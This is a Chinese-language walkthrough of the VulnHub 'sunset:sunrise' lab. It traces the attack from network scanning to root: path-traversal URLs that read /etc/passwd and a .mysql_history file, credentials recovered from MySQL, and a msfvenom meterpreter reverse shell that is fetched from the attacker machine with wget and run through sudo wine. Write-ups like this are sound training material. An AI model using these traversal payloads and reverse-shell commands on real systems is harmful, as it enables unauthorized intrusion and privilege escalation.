vulnhub之sunset:sunrise的实践

admin 2022年2月7日00:33:27评论81 views字数 1281阅读4分16秒阅读模式

今天实践的是vulnhub的sunset:sunrise镜像,

用workstation导入成功,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之sunset:sunrise的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.151,

vulnhub之sunset:sunrise的实践

看到8080端口有Weborf/0.12.2服务,搜到存在目录穿越漏洞,

vulnhub之sunset:sunrise的实践

访问密码文件,http://192.168.137.151:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd,


vulnhub之sunset:sunrise的实践

发现sunrise和weborf两个用户,对weborf用户进行目录文件遍历,

dirb http://192.168.137.151:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f,

vulnhub之sunset:sunrise的实践

访问隐藏文件,http://192.168.137.151:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history

vulnhub之sunset:sunrise的实践

得到用户名密码weborf/iheartrainbows44,

ssh登录,ssh [email protected]

vulnhub之sunset:sunrise的实践

sudo -l发现不能切到root,继续研究另一个用户,

通过数据库内容能够找到sunrise的用户名和密码,

mysql -u weborf -p
show databases;
use mysql;
show tables;
select * from user;

select user,password from user;

vulnhub之sunset:sunrise的实践

得到用户名密码,sunrise/thefutureissobrightigottawearshades,

切换账户,su sunrise,sudo -l发现wine程序是root权限的,

vulnhub之sunset:sunrise的实践

在kali攻击机上造一个反弹shell可执行程序,

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.230 LPORT=4444 -f exe -o shell.exe,

开启http下载服务,python2 -m SimpleHTTPServer,

在靶机上下载反弹shell可执行程序,cd /tmp,

wget http://192.168.137.230:8000/shell.exe,

在kali攻击机上开一个反弹shell监听,

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.230
set LPORT 4444
exploit

在靶机上通过wine程序执行反弹shell程序,sudo wine shell.exe,

kali攻击机上能够获取到靶机的反弹shell,确认是root,

vulnhub之sunset:sunrise的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之sunset:sunrise的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月7日00:33:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之sunset:sunrise的实践http://cn-sec.com/archives/766535.html

发表评论

匿名网友 填写信息